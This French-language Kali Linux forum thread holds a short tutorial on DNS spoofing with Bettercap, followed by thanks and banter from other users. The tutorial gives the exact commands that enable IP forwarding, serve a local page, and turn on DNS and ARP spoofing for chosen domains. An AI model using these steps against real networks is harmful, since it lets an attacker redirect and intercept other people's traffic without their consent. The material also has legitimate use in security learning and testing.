Le Forum francophone communautaire des utilisateurs de Kali linux

Tout le reste ici => Vrac => Discussion démarrée par: investdatasystems le 26 novembre 2019 à 16:38:23

Titre: Petit tutoriel DNS Spoofing avec Bettercap
Posté par: investdatasystems le 26 novembre 2019 à 16:38:23
Salut tout le monde ! Alors une première pour moi ici, avec ce petit tutoriel sur l'utilisation de Bettercap pour le spoofing DNS sans utiliser l'outil arpspoof ni dns2proxy ni ettercap !

Le prérequis est d'avoir installé bettercap, mais les tutoriels pulullent sur le net sur ce point alors je vous laisse voir pour cette étape.

Alors il faut savoir qu'il y a 2 façons de spoofer les requêtes DNS sur bettercap.

Une première manière de faire est de répondre aux requêtes en les faisant pointer vers votre serveur web local.
Exemple : mondomaine1.com, mondomaine2.com et mondomaine2.com redirigeront vers votre machine Kali Linux 192.168.1.111 (exemple, mais c'est l'adresse de votre carte réseau que vous verrez par une commande ifconfig), cette machine répondant par une page web fournie par le serveur intégré à Bettercap, et fournissant les pages HTML d'un répertoire arbitrairement défini (par exemple à /var/www/html).

Une seconde manière de faire est d'utiliser un fichier de configuration qui associera une adresse IP à chaque nom de domaine des requêtes.
Exemple : mondomaine1.com sera dirigée vers l'adresse ip i1.i2.i3.i4, mondomaine2.com sera dirigée vers l'adresse ip i5.i6.i7.i8 etc...

Je vais expliquer dans ce tutoriel comment faire pour la première manière, dont l'objectif est d'avoir toutes les requêtes DNS pointant sur le serveur web sur votre machine Kali.

Dans un premier temps on active l'IP forwarding par :
echo 1 > /proc/sys/net/ipv4/ip_forward
Ensuite on vérifie que cette commande a produit l'effet escompté :
cat /proc/sys/net/ipv4/ip_forward
Puis on démarre bettercap :
sudo bettercap
On définit l'adresse du serveur web local sur lequel seront dirigées les requêtes DNS :
set http.server.path /var/www/html
On démarre le serveur web local intégré à bettercap :
http.server on
On active la prise en compte des requêtes DNS externes à notre machine :
set dns.spoof.all true
On définit les noms de domaine qui seront spoofés :
set dns.spoof.domains mondomaine1.com, mondomaine2.fr, mondomaine3.co.uk
On démarre le spoofing DNS et ARP :
dns.spoof on
arp.spoof on

Et voilà !

Dans un prochain tutoriel j'expliquerai l'utilisation d'un fichier de configuration (de mapping entre domaines et ip).

Have fun !

Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: Mikoto le 26 novembre 2019 à 17:49:45
c'est intéressant dommage que tu explique pas ce qu'est le dns spoofing  :P
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: Snk le 26 novembre 2019 à 17:55:05
Sympa.  Merci à toi, d'avoir donné un peu de ton temps.  ;)
(C'est vrai qu' une petite définition aurait été un plus, pour ceux qui ne connaissent pas.)
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: ZeR0-@bSoLu le 26 novembre 2019 à 18:11:14
Salut,

ça fais un tuto dns spoofing en plus :)

Merci :)
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: investdatasystems le 26 novembre 2019 à 19:46:39
De rien, c'est avec plaisir !!
Titre: Re : Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: investdatasystems le 26 novembre 2019 à 19:48:52
c'est intéressant dommage que tu explique pas ce qu'est le dns spoofing  :P

Oui c'est vrai, dès que je trouve un peu de temps j'agrémenterai le tuto ! :)
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: ZeR0-@bSoLu le 26 novembre 2019 à 19:50:48
Pense à éditer tes messages au lieu d'en poster plusieurs à la suite ;)
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: investdatasystems le 26 novembre 2019 à 19:51:54
Ok chief !
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: Koma le 26 novembre 2019 à 21:05:47
Cool ça merci ! N'hésite pas à passer dire bonjour dans la shoutbox ;)
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: ZeR0-@bSoLu le 27 novembre 2019 à 09:04:56
Il passe déjà pour demander des trucs :P
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: investdatasystems le 27 novembre 2019 à 10:05:53
Merci Koma ! Et non ZeR0-@bSoLu, j'ai rien demandé moi !  ;D
Titre: Re : Petit tutoriel DNS Spoofing avec Bettercap
Posté par: ZeR0-@bSoLu le 27 novembre 2019 à 10:29:08
Non jamais :P